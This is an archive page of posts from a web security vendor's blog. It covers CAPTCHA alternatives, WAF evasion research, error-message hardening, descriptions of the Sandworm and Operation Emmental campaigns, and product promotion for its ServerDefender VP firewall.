Is CAPTCHA Best for Form Spam?

Posted: August 1st, 2016
Filed under: Web and Application Security
Tags: ,


CAPTCHA tests are not hard to find on the web. But neither are complaints about them.

Do you have CAPTCHA on your site to block form spam? Other options to filter out bot form submissions exist. Let’s explore whether those options would work for your company, or if you should stick to the CAPTCHA standard.

 

 

Why CAPTCHA?

CAPTCHA protects sites displaying or collecting data with tests that humans can pass but bots cannot. CAPTCHA stands for Completely Automated Public Turing Test To Tell Computers and Humans Apart.

These tests are commonly found when performing online activities such as:

  • Submitting a form
  • Posting a comment
  • Completing registration

There are also drawbacks to using CAPTCHA:

  • It can degrade the user experience if input incorrectly
  • It can present accessibility issues for people when it comes to deciphering the codes
  • It creates a security arms race: CAPTCHA technologies progress to make it hard for bots, bots respond. Actual users get stuck in between.

 

Have you noticed CAPTCHA can be hard? What if this challenge means you are blocking bots but also losing human users in the process? While CAPTCHA are becoming harder for bots  to break, they are also getting harder for humans to decode. If alternatives exist, that means sometimes CAPTCHA is not necessarily the right solution.

Most bots scraping site forms are not tailored to a specific site, unless:

  • You’re running the website of a large corporation
  • Your business is one commonly at risk for a security attack

Therefore, CAPTCHA maybe better, but only in certain use cases.

A Different CAPTCHA Solution

People have pretty strong feelings about CAPTCHA. Those feelings came to light when some Port80 Software team members were discussing form SPAM issues. One senior team member compared CAPTCHA to DEFCON-5. So our challenge was set to find something less off-putting.

One senior team member compared CAPTCHA to DEFCON-5. So our challenge was set to find something less off-putting.

One strategy to prevent form SPAM that seems to work well is called the honeypot technique. It is a different methodology than CAPTCHA that capitalizes on the default behavior of bots. A honeypot lures bots into exposing themselves and leaves the humans alone.

 

In this case, you add an empty form field in the code, but one that a user doesn’t see. If it is not visible to the human eye, a human user would not fill it out. But a bot would, because they see what’s in the code, not what’s visible on the page.

Once you detect that the form field has an input, you can probably guess this was not the work of an actual human being. Validation on the client side flags it and the form submission will fail. If JavaScript is disabled, server side validation will pick it up. And even though it’s a bot, you could display an error message on the page saying that they didn’t pass your spam validation.

Benefits

  • This method is virtually seamless for the user and does not degrade user experience. Users don’t have to guess images or figure out what an upside down backwards piece of text is saying. A good move might be to make it a starting place. Try this first and see how well it reduces your SPAM and improves user experience.
  • It doesn’t require the use of another API or integrating another service on to your page, thus saving on bandwidth and load times.

Drawbacks

  • This doesn’t offer as much security as a ReCaptcha API, but it should still work for a majority of companies who aren’t the specific target of security attacks. If you’re a bank, hospital, or other likely target, you’ll likely still want the rigor of a full Turing test, like CAPTCHA.
  • If a hacker is targeting your site specifically, they will most likely tailor a bot to your site that will allow them to mimic human like behavior and bypass the form check. (Nothing is 100%)

Google and the Future of CAPTCHA

The honeypot technique is just one alternative when it comes to form SPAM. There are some changes web users can expect to see in the future from Google in this area as well. One you may already be seeing is the reCAPTCHA that detects human-like mouse movements to verify a real user is submitting a form.

The other is an invisible reCaptcha option:

We know some developers who have been invited to try invisible CAPTCHA before it is officially implemented by Google. We’ll keep you posted on what they find out during their tests.

No Comments »

Are There Holes in Your Web Application Firewall?

Posted: September 17th, 2015
Filed under: Port 80 News, Web and Application Security
Tags: , , , , ,


Last week, The Port80 Software team took a leisurely stroll through /r/NetSec  on Reddit and found a very interesting post. It linked to a paper about vulnerabilities found in popular commercial Web Application Firewall (WAF) products. The findings within and their ramifications for ServerDefender VP are worth reading about for anyone who has an interest in data security.

Evading Web Application Firewall XSS Filters

In his paper, Mazin Ahmed writes:

“Due to the increasing use of Web-Application Firewalls, I conducted a research on all well known Web-Application Firewalls to check their efficiency in protecting against cross-site scripting attacks. The motive behind this research was to confirm that there is no effective way to protect against a vulnerability other than fixing its root cause. The tests were conducted against popular Web-Application Firewalls, such as F5 Big IP, Imperva Incapsula, AQTRONIX WebKnight, PHP-IDS, Mod-Security, Sucuri, QuickDefense, Barracuda WAF, and they were all evaded within the research.”

After reading through the research and running some checks on its validity, we had some  burning questions in our minds:

  • What does this mean for those of us who rely on WAFs?
  • How about those of us who trust ServerDefenderVP?

Here’s what you need to know.

A Quick Refresher on WAFs and XSS

A web application firewall (WAF), as the name implies is a Firewall that can take on several forms. It can be an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation.  These rules protect against common threats, such as cross-site scripting (XSS), SQL injection (SQLI), and other web-application related vulnerabilities. “XSS attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application uses input from a user within the output it generates. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site”[1].

My WAF has holes in it! Help!

holes in wall for holes in a web application firewall

Without getting into the specifics, Mr. Ahmed’s research indicated that all of the WAF’s he tested could be exploited by using Cross-Site Scripting attacks. Ironically, a WAF should be able to defend against these attacks. Some of the scripts he used were old or uncommon. As a result, they were able to bypass the WAFs he tested. As Mr. Ahmed writes, the toughest exploit he found took him approximately half an hour to find. This is fairly troubling news. However, fortunately for the NetSec community, this research has been published after the necessary manufacturers were notified and given time to patch their products.

How Well Does ServerDefender Defend?

server defender logo

The answer may surprise you! (Just kidding). We decided to try some of Mr. Ahmed’s well-documented exploits on ServerDefender VP 2.2.6 to see if it would break.

SDVP screenshot means it is working

We were pleased to find that the exploits were greeted with everyone’s favorite “Are you Trying to Hack Us?” error page and logged appropriately as XSS.

From there, we decided to take things a step further and run these exploits past our super secret, not even announced, still in development NEW VERSION of ServerDefender, and were greeted with the same results.

However, we weren’t satisfied with a simple victory. We wanted to know for sure that our product could withstand the same stringent testing that other WAF’s went through. So we went directly to the source and contacted Mr. Ahmed to see if he would put ServerDefender through the trial.

The Result?

Our invitation to Mr. Ahmed to test ServerDefenderVP was accepted! We will keep you posted as we receive word on his research efforts.

In the meantime, if you are interested in putting ServerDefender VP through your own testing, please, get your free 30 day trial of SDVP and give it a try. We’d love to hear your thoughts on it.

No Comments »

Our (Signatureless) Approach to Web Application Security

Posted: February 6th, 2015
Filed under: Web and Application Security


In a recent post, we focused on the problems with the signature-based security model. Signatures have been a staple of web application security and cyber security for some time, but are problematic in the sense that they don’t provide adequate protection in today’s landscape of ever-evolving threats.

Now, we want to explain how we approach web application security with our Web app firewall, ServerDefender.

(We encourage you to go back and read that article in full. It’s a good read, we promise!)

The Behavioral & Algorithm-based approach

Although we don’t use signatures, we still have a means for analyzing and determining whether or not a user is malicious.

Our method analyzes behavior by tracking the actions that occur over the course of a session. Activity is monitored by an algorithm that establishes what bad behavior looks like (we’ll touch on this more later), and should the user cause too many errors, the software will begin to take action. Users who repeatedly cause errors are going raise an alert and the software will begin to impede their site usage until they’re ultimately blocked temporarily, then permanently.

Behavioral scoring allows errors errors to broader or more generic (not signature matches but actual error states like 404s and 500s) because you’re not blocking every single error. By continuously tracking and monitoring and building up a sort of “threat profile” that discerns patterns and indicates misbehavior – even before anything that would match a threat signature is seen.

Whitelist vs. Blacklist = Greylist?

On top of behavioral scoring, we also employ a combination of blacklists and whitelists – a sort of greylist approach.

The signature model is inherently a blacklist approach to security. That means that everything is allowed by default unless it is on a ‘naughty list’ or list of malicious inputs or actions. This is dangerous because the default action is to allow, and only when something is known to be bad is it blocked.

The whitelist approach isn’t perfect either. This is the inverse of blacklisting, where everything is blocked by default unless it’s on a list approved inputs or actions. This might be easiest to think of as analogous to a list at an exclusive club or restaurant. With the whitelist approach only people with their name on the list are allowed in, while all others are turned away. The blacklist approach turns away anyone who is on a disallowed list, and lets everyone else in without discretion.

Here’s an example of one of the whitelists within ServerDefender’s controls. This particular example is not very permissive and shows how broad the controls can be.

Here’s an example of a blacklist in ServerDefender. This shows the specific resources that cannot be requested on a site, with all other resources being allowed.

The whitelist approach is inherently more secure, but more prone to false positives since the default action is block. However, our powerful and easy-to-use method for creating exceptions makes adding to whitelists entirely manageable.

Algorithmic Detection

We also look at a number of factors within a given user input and determines if there is an exploit contained in it. This is the algorithmic type of rule. It’s not based on a specific signature or set of signatures. Instead it looks for conditions that have to be met for a particular type of exploit to be effective, and blocks when those conditions are met. This makes it much more generic than signature based rules.

This does increase the false positive risk, so again, you do need good exception-management. This is something we built into ServerDefender in order to quickly loosen security controls for something very specific, while not compromising the overall security of the app. Plus, it is much more manageable to apply these occasional exceptions than to build up fully accurate whitelists field-by-field for an entire app, and keep them up to date as code changes.

Find the log for your false-positive by either entering the event ID, or filtering down to a specific set of parameters. Right-click and select ‘Add Input Exception’.

The add exception dialogue let’s you specify name, comment, what criteria to match, and the restrictions to make.

This allows errors to be broader or more generic (not signature matches but actual error states like 404s and 500s) because you’re not blocking on every single one. But if you track and build up a score or profile you can discern patterns that indicate misbehavior, even before anything that would match any actual threat ‘signature’ is thrown at the app. (e.g., too many ‘innocent’ looking errors from the same source, or with too great a frequency).

Philosophy

Signatures may make for a great business model, but they don’t make for a great security model. Signatures don’t account for unknown vulnerabilities, and are too easily bypassed in today’s world of advanced hackers. Our approach is and has always been to create tools that provide real security through algorithmic analysis and distrusting inputs.

If you have any questions about our approach to security, please feel free to reach out to our team. We’d love to chat!

No Comments »

Exploring the LogViewer in ServerDefender VP

Posted: November 15th, 2014
Filed under: IIS & HTTP, Web and Application Security
Tags: , , , , , ,


Security You Can See

For the least few years, we have been developing ServerDefender VP, an advanced Web application firewall for IIS. One of the features that has been evolving along with ServerDefender VP is the LogViewer. This is the hub of the WAF where users can interact with and monitor malicious traffic hitting their site. Since there is so much to do within the LogViewer it sometimes becomes easy for a feature or two to be missed, so we’ve decided to explain some of the cool tricks its capable of.

What is the LogViewer?

The LogViewer is a tool that visualizes events (blocked threats and errors) that occur in your application and allows you take a variety of different actions on them with only a few clicks. When selecting an event users can see an array of data that pertains to it such as the referrer, user-agent, IP address, session ID, GET and POST data, and other critical information.

ServerDefender VP Web app firewall LogViewer

Click to enlarge.

What Can Actions Can I take on an Event?

There are several different actions that a user can take on an event in the LogViewer. The primary actions are for security settings (blocking IP addresses and creating exceptions), forensic tools (viewing all events by IP, comparing a session against IIS logs), and exporting reports.

ServerDefender VP LogViewer Actions

Click to enlarge.

Adding Exceptions

One of the key actions available to users from the LogViewer is the ability to add an exception to event, such as a false positive. Adding an exception on an event lets users specify new settings should the same event occur. This means that users can tell a blocked action to be allowed and configure new rules for the future.

ServerDefender VP Input Exception

Click to enlarge.

Forensics

The LogViewer’s forensic tools enable users to gain further knowledge about an event and the session and IP behind it.

“View This Session in IIS Logs” displays the session logs with errors recorded by ServerDefender VP highlighted. This feature is useful to determine what occurred in a session prior to an error occurring and establishing the validity of an error, should there be any questions around it.

“View this IP Only” displays only the events in the LogViewer attributed to that IP address. This makes it easier to visualize the actions of a single IP address and understand its patterns, which can help users determine if the action they should take against the IP, if any.

Questions for Us? Ready to try?

The LogViewer is a powerful tool for viewing malicious traffic in your app and way to quickly react to events. If there’s anything else you’d like to learn about the LogViewer – or ServerDefender VP in general –  send us an email at info@prot80software.com or Tweet us @port80software. If you’d like to enjoy a 30-day free trial, go ahead and download now.

No Comments »


How Your HTTP Errors Are Helping Hackers

Posted: October 23rd, 2014
Filed under: Web and Application Security


What Errors Are

Error messages are a fairly standard part of the web that can provide useful information to developers to resolve issues or indicate to users that there is something wrong with a page. While smart developers and site admins will customize error messages to hide sensitive info, sometimes something as simple as a careless change to a configuration  file can expose verbose  HTTP errors – including 500-level errors that can contain normally-hidden details of your application. While this is okay for your developers to see – in order to resolve the error – these are not okay for external users to see.

Scenarios in Which You Might See an Error

Of course, errors are not desirable. Errors are more like the ugly blemish that haunt every app at some point and some are more serious than others. Detailed errors can provide contextual information pertaining to things like the server’s directory structure, the SQL queries being run, or the modules and libraries loaded by the application framework. By generating an error response, a hacker now has context for what creates a particular error state and also gains a little bit of extra knowledge about the site.

Why is This Useful?

Even seemingly unimportant or small bits of information can be very useful. With enough time and patience a hacker can use the initial leakage of information to probe further. Based on the knowledge gained from the initial error, they can dig deeper to see what other errors they can elicit. Much like a detective following a lead from a piece of evidence, a hacker can follow the knowledge gained from a piece of information to it’s conclusion. In all likelihood, they’ll come across another valuable piece of information via an error (if errors are completely unsuppressed) which will lead them down another path to explore and investigate. All this probing really puts a site at risk, as it increases the chances that a vulnerable piece of software (plugin, library, framework, etc.) is discovered. If a hacker can pinpoint that you’re using version A of X library with Y known vulnerability, then there is a very clear path to exploitation and causing serious damage.

Recon for Attack – Just like Real War

“Know your enemy” wrote Sun Tzu in the  Art of War, and most would agree that it’s unwise to launch an attack on a target without doing some reconnaissance to find points of weakness and points of strength. This principle applies to web technologies as well. Hackers can use error messages to probe and determine areas of weakness within their target. Giving hackers the ability to create errors without penalty is incredibly valuable as it gives them free reign to scout your site and gear up for attack. If areas of weakness or vulnerability are found during the scouting process, then the site can be added to a list of vulnerable sites, which then can be attacked by others in the community. If finding errors is the first line of attack, then hiding those errors should be the first line of defense. By preventing hackers from gathering accurate information about your site or app, you keep them from gaining an upper hand. Suppressing error messages is part of anti-reconnaissance and a solid defense-in-depth strategy.

An Internal Conflict

On the surface, detailed error messages can be useful for developers to debug issues. In fact, in many cases developers like these messages as it makes their jobs easier. Detailed messages often point right to the source of a problem, even indicating which line of code or which method is problematic and in which file. Just as this little snippet of information is invaluable to a developer doing some debugging, this information is useful to a hacker who is trying to cause trouble. Quickly, we can begin to see a conflict arising between a developer and a security professional:

  1. Dev wants detailed error messages in the app because this makes his/her life easier
  2. IT wants non-detailed error messages because this makes his/her life easier – and it protects the company
  3. Without detailed error messages, dev’s job becomes more difficult, and more time/company money is spent debugging code

While the sysadmin-developer divide is nothing new, this is a sensitive area because security is coming into play. That means that security should take precedence, but it doesn’t mean that developers’ jobs need be made more difficult.


Some interesting articles involving information leakage

Five Data Leak Nightmare OWASP on Information Leakage What is information leakage? 


Solution with ServerDefender VP

Luckily, this type of recon can be prevented and developers jobs don’t need to be made more difficult. Here at Port80, we spent a lot of time thinking of the best way keep verbose error details out of the hands of hackers. The solution we came up with is very simple: don’t show verbose error messages. Over the last few years we’ve developed a complete web application firewall called ServerDefender VP that offers the ability to handle errors. We developed methods to handle errors in two ways:

  1. Spot and prevent verbose 500 HTTP errors from being outwardly displayed
  2. Mask all errors with a generic error message, so all errors will look the same to would-be hackers

We also included the ability to whitelist IP addresses. This means that if a developer needs to debug something, the sysadmin can add their IP to a list of excluded IPs. This tells ServerDefender VP to let those IP addresses bypass the error handling controls, therefore allowing users to browse the site without error messages being suppressed.

How does it work?

These capabilities are default features in ServerDefender VP and are powerful ways to prevent reconnaissance. Here’s what happens when ServerDefender VP encounters a 5xx HTTP error:

  • User browses to a page
  • An HTTP error is caused and generated
  • ServerDefender VP catches the response before it’s posted
  • Instead of showing the HTTP error status code, SDVP sends a generic error response.  This can be not only a page that discloses no sensitive data, but even a response code that is normalized so that nothing can be inferred from it (e.g., 404 instead of 500).
  • The end user now knows something went wrong, and can even be shown a helpful site-customized experience to get them back on track, but not specifically what

This error message can be customized to be anything, but most importantly it ensures that no valuable reconnaissance information is leaked; the error is suppressed by ServerDefender VP and never sent to the client. This error handling technique takes away the first line of attack and means that hackers won’t be able to find clues that make it easier for them to hack you. We’ll leave you with one more piece of advice from Sun-Tzu, that sums up SDVP’s attitude toward data-hugry hackers: “Be extremely mysterious..thereby you can be the director of the opponent’s fate.

No Comments »

Zero-Day Vulnerability (CVE-2014-4114) in Windows Server Exploited by Russian Espionage Group “Sandworm”

Posted: October 14th, 2014
Filed under: IIS & HTTP, Web and Application Security


 

A Russian espionage group is exploiting a zero-day vulnerability in Windows Server 2008 and 2012, iSIGHT Partners reported on Tuesday. Microsoft is currently working on a patch for the vulnerability (CVE-2014-4114), but a number of targets have already been hit.

When exploited, this vulnerability allows an attacker to remotely execute arbitrary code, but requires a specially crafted file and use of social engineering to convince a user to open the file. iSIGHT noted specifically that PowerPoint files were used to exploit the vulnerability.

While there are specific targets that have been named, iSIGHT is also quick to point out that the visibility of the attack is limited and there is potential for broader targeting beyond this group of targets. The known targets include:

  • NATO
  • Ukranian government organizations
  • A Western European government organization
  • Energy sector firms (specifically in Poland)
  • European telecommunications firms
  • An United States academic organization

The team behind the attacks was dubbed the “Sandworm Team,” based on encoded references in command and control URLs and malware samples that refer to the sci-fi series Dune. iSIGHT reported that it has been monitoring the Sandworm Team since late 2013, and believes they were formed sometime in 2009.

Geopolitical Tensions Creating Targets

The takeaway here seems to be that the attacks do not only target governmental entities. The Sandworm Team has instead targeted entities that are geopolitically relevant in a broader sense: energy, telecommunications, education.

This should serve as a sign of potential threats to come. Private sector businesses that are strategically sensitive in a geopolitical sense might be on some state’s list of targets. This means organizations that share information with, provide services to, or provide infrastructure utilized by governmental organizations may be at risk. State-sponsored attacks will focus on targets with strategic significance which can range from obvious ones like power grids and financial institutions to less obvious targets like research universities.

State-sponsored attacks are on the rise and the targets are becoming broader. Organizations who align themselves with sensitive entities should have a heightened sense of awareness and look to raise their defenses if needed.

We will update this post accordingly as the story continues to develop.

No Comments »

Bank customers attacked with malicious campaigns named “Operation Emmental”

Posted: July 31st, 2014
Filed under: Web and Application Security


from our partners at Net-Square

Criminals were successful in bypassing an Android-based, two-factor authentication system during their spear phishing and malware attacks. The malicious campaign, known as Operation Emmental was discovered by a security software company earlier this year.

The criminal gang which managed Operation Emmental used phishing attacks to gather bank customer’s personal information and other sensitive data, including:

They used this information to bypass bank authentication systems used by 34 different banks across four countries.

These attacks were first discovered about five months ago and have been actively targeting customers of financial services firms from Switzerland, Austria, Sweden and Japan. All of the targeted banks use a session-based token, sent via SMS, to act as a second factor for authenticating users before they’re allowed to log into their online bank account.

How Operation Emmental Was Executed

It all starts with a fake email that looks like it was sent by a legitimate and well-known entity. Then the cyber criminals serve malware attached to the email as an apparently harmless Control Panel (.cpl) file.

If users execute the malware, which may be disguised as a Windows update tool, the malware changes their system’s settings to point to an attacker-controlled Domain Name System. This allows attackers to secretly observe and control all HTTP traffic. Next, a new root Secure Sockets Layer (SSL) certificate is installed, which looks legitimate and prevents web browsers from warning victims of a bad/insecure cert as it normally would.

The malware deletes itself leaving behind only the altered configuration settings. This makes the attack difficult to spot: when users with infected computers eventually try to access the bank’s website, they are instead pointed to a malicious site that looks and works just like the real bank website.

The next phase of the attack occurs when users log into the fake banking site. Once logged in, users are instructed to download and install an Android app that generates one-time tokens for logging into their bank. In reality, it will intercept SMS messages from the bank and forward them to a command-and-control server or to another mobile phone number.

This means that the cybercriminal not only gets the victims’ online banking credentials through the phishing website, but also the session tokens needed to bank online as well. The criminals end up with full control of the victims’ bank accounts. By stealing the credentials and compromising the authenticated session of the user, it would appear normal to the Bank, as if a user is merely conducting a typical financial transaction. In reality, the user is potentially having their bank account drained without any of the typical banking warning flags going up.

What can you do to protect yourself and your users?

One recommendation comes from the researcher who first discovered this attack. Improve the verification schemes for users and user transactions. If the verification process went beyond multi-factor authentication or session-based tokens via SMS, it could prevent this particular type of campaign.

In addition, banks should warn their customers never to click on links in emails, but instead cut and paste links in the browser bars.

In the remediation report, additional recommendations have stated that banks should implement open source Domain-based Message Authentication, Reporting & Conformance (DMARC) technology. This helps in verifying the email origin and domain names, eventually blocking many types of phishing attacks against customers. DMARC is fundamentally important since it ascertains whether an email of a domain name is spoofed or impersonated.

The lessons learned from Operation Emmental are ones that stretch beyond banking. These concepts can be applied to any type of app with a secure login. If you have any questions about testing or securing your app, please feel free to reach out to us!

No Comments »

The Most Comprehensive Web Application Vulnerability Scanner Benchmark Out There

Posted: March 6th, 2014
Filed under: Web and Application Security
Tags: , , , , , , , ,


Many of customers come to us asking how they can test their web applications for vulnerabilities. For an automated approach, there a numerous web application vulnerability scanners  out there that can help detect vulnerabilities. With so many options, picking the appropriate scanner can be a little bit tricky. Which is most accurate? Which is the most thorough? The answer is rarely clear.

Lucky for us, the folks over at Security Tools Benchmarking recently assembled their yearly list of web scanners, aptly named “The Web Application Vulnerability Scanners Benchmark”. The list is very comprehensive and puts both open source and commercial scanners through a gamut of tests. The assessment looks at twelve different aspects of each tool to assist individuals and organizations in their evaluation of vulnerability scanners.

In total, 63 different web application vulnerability scanners were test (we’d say that’s pretty thorough), with 49 of those being free or open-source projects, and 14 of them being commercial.

The following features were assessed during the evaluation:

  • The ability to detect Reflected XSS and/or SQL Injection and/or Path Traversal/Local File Inclusion/Remote File Inclusion vulnerabilities.
  • The ability to scan multiple URLs at once (using either a crawler/spider feature, URL/Log file parsing feature or a built-in proxy).
  • The ability to control and limit the scan to internal or external host (domain/IP).

You can organize the scanners by commercial or open source and see a quick comparison of each scanner’s features. From there you can dive into a detailed report for individual scanners.

View the full commercial comparison.

View the full open source comparison.

If you’re looking for a scanner, we encourage you to take a look at the comple report and evaluation criteria over at the Security Tool Addict blog. If you have questions about remediating or securing vulnerabilities after your scan, you can always contact Port80 Software for advice.

 

No Comments »

Privilege Escalation Vulnerabilities Headline Modest January Security Bulletin

Posted: January 15th, 2014
Filed under: Web and Application Security
Tags: , , , ,


Microsoft is kicking off 2014 with a modest security bulletin, which includes several vulnerabilities for Windows XP and Windows Server 2003. Luckily, none of this week’s batch contain any critical vulnerabilities. We are graced with ‘Important’-level vulnerabilities across the board.

Nevertheless, as with any security update, we recommend downloading and applying as soon as possible.

Apply all the Patches

MS14-001: Microsoft Office, SharePoint Server, Office Web Apps

Vulnerabilities in Microsoft Word and Office Web Apps Could Allow Remote Code Execution (2916605)

Attention Microsoft Office users with admin privileges: this update is intended for you. It fixes an issue in Microsoft Office that primarily affects 2010 and 2013 versions. If a specifically-crafted malicious file is opened using a vulnerable version of Word or other Office software, remote code can be executed. Microsoft says that a successful attack could allow the hacker gain the same user rights as the current user.

See affected versions and download patches

Read the rest of this entry »

No Comments »

3 Web Security Videos that Will Make You Sleep with the Lights On

Posted: October 30th, 2013
Filed under: Web and Application Security
Tags: , , ,


From the perspective of a business owner, the web can be a terrifying place, ripe with threats. We’ve compiled a list of our favorite web security videos that will make you want to disconnect from the internet and hide.

Continue Reading

No Comments »

Securing Azure with ServerDefender VP Web Application Firewall

Posted: July 12th, 2013
Filed under: Web and Application Security


With the growing popularity of cloud platforms such as Windows Azure and Amazon Web Services, the need for a viable cloud security option has increased. Installing and getting started with ServerDefender VP on Microsoft Azure is a simple process that only takes a few steps. If you’re launching a new Azure VM, then you’ll be able to use ServerDefender VP to secure your deployment just as you would with any other virtual or physical instance.

Since ServerDefender VP is a host-based web application firewall, meaning it installs the server, it is able to provide security in the cloud, whereas many hardware web application firewalls would not be able to do so (you can’t really deploy a physical piece of hardware on a virtual cloud server). This makes ServerDefender VP well suited to provide application layer protection on Azure.

Steps to Setting Up ServerDefender VP on Windows Azure

You can get ServerDefender VP up and running in just a few steps:

1) Launch a VM in the Azure console.

2) Connect to the VM and open up Server Manager. Here, you will need to install the IIS server role, as well as both ISAPI Filter and ISAPI Extension roles in order to install ServerDefender VP.

3) Once installation has completed, open up a web browser and visit http://www.port80software.com/products/serverdefendervp and download the appropriate version.

 

4) Run the installer to completion.

5) Start using ServerDefender VP!

It’s as simple as that. With ServerDefender VP running on your Azure VM you can begin to configure it to provide the security you need to protect your apps.

Be sure to download the free trial of ServerDefender VP and check out the documentation for information on how to get started and configure its security policies. If you have questions about getting started with ServerDefender VP on Azure, contact one of our security experts today.

 

No Comments »

Hacked? Who You Gonna Call?

Posted: April 23rd, 2013
Filed under: Web and Application Security


If there’s somethin’ strange in your neighborhood, Who ya gonna call? If it’s somethin’ weird and it don’t look good, Who ya gonna call? Ghostbusters?

You could ask the same question when it comes to the web today: Who are you going to call when you get hacked? The local police? Well that’s not as easy as placing a call for a crime in the physical world. A recent piece by Eileen Sullivan of the Associated Press details how local police struggle with responding to cybercrimes.

There are numerous reasons local authorities cannot deal with hackers: For one, police have to act within their jurisdictions. Even if police had the technical capabilities to track down and stop a perpetrator, if they were acting from from thousands of miles away there would be little they could do because of jurisdiction.
Continue Reading

No Comments »

5 Thoughts to Improve Your Infosec Maturity

Posted: January 8th, 2013
Filed under: Web and Application Security
Tags: , ,


From our partners at Net-Square

The year that was 2012 has ended, and it is time to start thinking about challenges that the New Year shall bring. As defenses get stronger, so do attacks. 2013 shall be the year of hybrid attacks – targeting man and machine together. The greatest challenge for 2013 shall lie in re-designing your Information Security strategy to measure up to heightened expectations. As you make your plans, let me share with you my top 5 thoughts for improving the maturity of your InfoSec program.

1. Plan on staffing a Red Team

A Red Team is “an independent group that seeks to challenge an organization in order to improve effectiveness”. Red Teaming has its origins in the military. In an InfoSec context, Red Teams serve as an “intelligence agency” to identify gaps, vulnerabilities and shortcomings in your organization’s IT infrastructure. The sole agenda of the Red Team is to find the holes before attackers do, while continuously coming up with new threat scenarios that impact the organization’s IT function.

2. Ensure that all IT purchases require InfoSec approval

There are few tasks more thankless than having to maintain security for an IT system that is defective by design. Talking to our clients revealed that 80% of all vulnerabilities fall under the “we know it already” category. “We have inherited a mess”. “We know it is broken, but what do we do?” Do these phrases sound familiar? Well then, make it a policy decision to evaluate and test all major IT requisitions before signing the cheque.

3. Insist upon pre-tested 3rd party developed software

Majority of the vulnerabilities we find lie in 3rd party developed software, or heavily customized implementations of large packaged applications. Shouldn’t the software vendor have their software tested for security vulnerabilities before selling it to your organization? It is time to insist for it during the procurement cycle and I would add insist on getting a White box testing certification.

4. Publish a testing calendar for the entire year…and stick to it!

Announce all your vulnerability assessment and penetration testing schedules for the entire year at the very beginning of 2013. Schedule quarterly or half yearly tests for all critical applications, and at least annual tests for all others. Let all your developers and vendors know of the testing schedules. Do not let the testing schedule get sidetracked by release cycles. Software production shall always be delayed. Delaying your testing shall only prolong the agony.

5. Conduct at least one surprise attack on a critical application

Hackers aren’t going to wait until after your system migration is complete. Hackers aren’t going to spare you during peak transaction hours. Hackers will target your live systems, not your UAT systems. And your IT team will always be stressed – 365 days a year. That is reality. So why conduct fairy-tale penetration testing? As a leader of your InfoSec organization, plan on conducting a surprise attack on the production servers of your critical application during peak business hours. Let me just say that this shall be the shortest path to figuring out the biggest gaps in your organization.

As always, I would like to quote “that which does not kill you makes you stronger.”

-Saumil

No Comments »

To “Open Source” or “Not to Open Source”

Posted: July 17th, 2012
Filed under: Web and Application Security
Tags: , , , , , ,


In the IT World, the strategy “To Open Source or Not to Open Source” is a perennial debate. While traveling last year, I came across many large Global Financial Institutions who are adopting Open Source as a strategy to implement all future solutions. Adoption of Open Source technology is a good strategy, especially in the complex licensing regimes practiced by many large software vendors. While security is an issue that bears upon the decision to go for it, not many fully understand how to take care of them when operationalizing the “Open Source Stack” strategy.

In recent times we have been called into test many applications, which are based on open source applications or a complete stack. Testing these applications have provided us some valuable insights to be considered while going the Open Source way.Before I discuss this, let me highlight that very rarely is an open source product used as-is. In most instances, the product undergoes heavy customization, including installation of many extensions. In light of this, our tests revealed two very important insights.

One, that many open source products have add-ons, extensions, plug-ins etc. which make them attractive in many ways. While the core application itself is mostly secure, it is these extensions and plug-ins contributed by many diverse developers and organizations that introduce vulnerabilities into the open source product as a whole. The graph below shows the number of vulnerabilities introduced in Joomla, a very popular open source CMS, between 2005 and 2011.

Open source vulnerabilities

While the graph may shock you, it is actually not surprising since Joomla has more than 1700 extensions and add-on modules. While many of them may be fixed, what we recommend is to only select those that do not have any known vulnerabilities.

Two, all our tests have revealed that the customizations done during the implementation have always introduced new vulnerabilities. So expecting that there will be less number of vulnerabilities simply because there is limited coding due to customizations is a fallacy.

Conclusion: Conducting a thorough Vulnerability Assessment and Source Code Review is even more vital when implementing open source products to cover your bases against any vulnerability introduced or already present but unknown. But this should not deter you from taking a strategic call on adoption of open source technologies. With the right security partner, you should be able to get the strategic advantages of Open Source, whether that be cost savings or risk mitigation! Until next time, stay safe!

-Hiren Shah, Net-Square Solutions

Follow Hiren’s views on Twitter @hiren_sh or on his blog.

No Comments »

How to Use a Web Application Firewall (The Right Way)

Posted: May 8th, 2012
Filed under: IIS & HTTP, Web and Application Security


The Perceptions of Web Application Firewalls

Difficult to configure. Confusing to use. Time-consuming to manage. Set-it-and-forget-it security. These are some of the perceptions of Web application firewalls that can be, in many cases, dangerous to the security health of your organization. Like physical exercise, exercising good security practices requires effort and commitment, but at the end of the day, the benefits far outweigh the costs. This may be news to some, but a Web app firewall is not a set-it-and-forget-it security crutch. Rather, a Web app firewall is a security tool that requires dedicated use. Most importantly, the Web application firewall isn’t a sentient being, it’s a device that, like many of man’s creations, is only as good as the person or people wielding it.

A State of Mind

Security is never a feature you can outright purchase. It’s not a box you can check, or a test you can pass and be done with. This rationale applies to security whether it be for a car, a home, or your Web apps. This is a concept most people can grasp in more physical, trivial day-to-day tasks, but sometimes is lost when it comes to the Web. For example, driving to and from work is potentially very dangerous. However, if you practice, get your license, and drive with caution, while avoiding activities like speeding and texting while driving, you will -in all likelihood – be safe. No one would get into the driver’s seat of a car for the first time and expect passive safety features like a seat belt and airbag to make up for their lack of experience. The same applies to Web app firewalls; there are measures of practice that must be applied in order to achieve security, one cannot rely solely upon passive features to do all the work. Web app firewall users need to be active drivers, not passive ones. Here are some tips to help keep in an information security state of mind, and become an active Web app firewall driver.

Think in Layers

Don’t: Put up only a single obstacle to prevent vulnerability exploits.
Do: Use a Web app firewall as one layer in a multi-layered wall.
Why: Most code in applications isn’t perfect (really, none of it is, but even if it was finding legitimate paths of entry via proper authorization information is possible). This means there are flaws in it that can be exploited by attackers. However, flaws or vulnerabilities oftentimes cannot be easily fixed or recognized. Security should be thought of in layers, with each layer serving its own purpose and no layer being responsible for the entire load. Think of home security; you may have a fence, locks on your doors, and an alarm. A WAF should only constitute a single layer in a larger defense scheme.
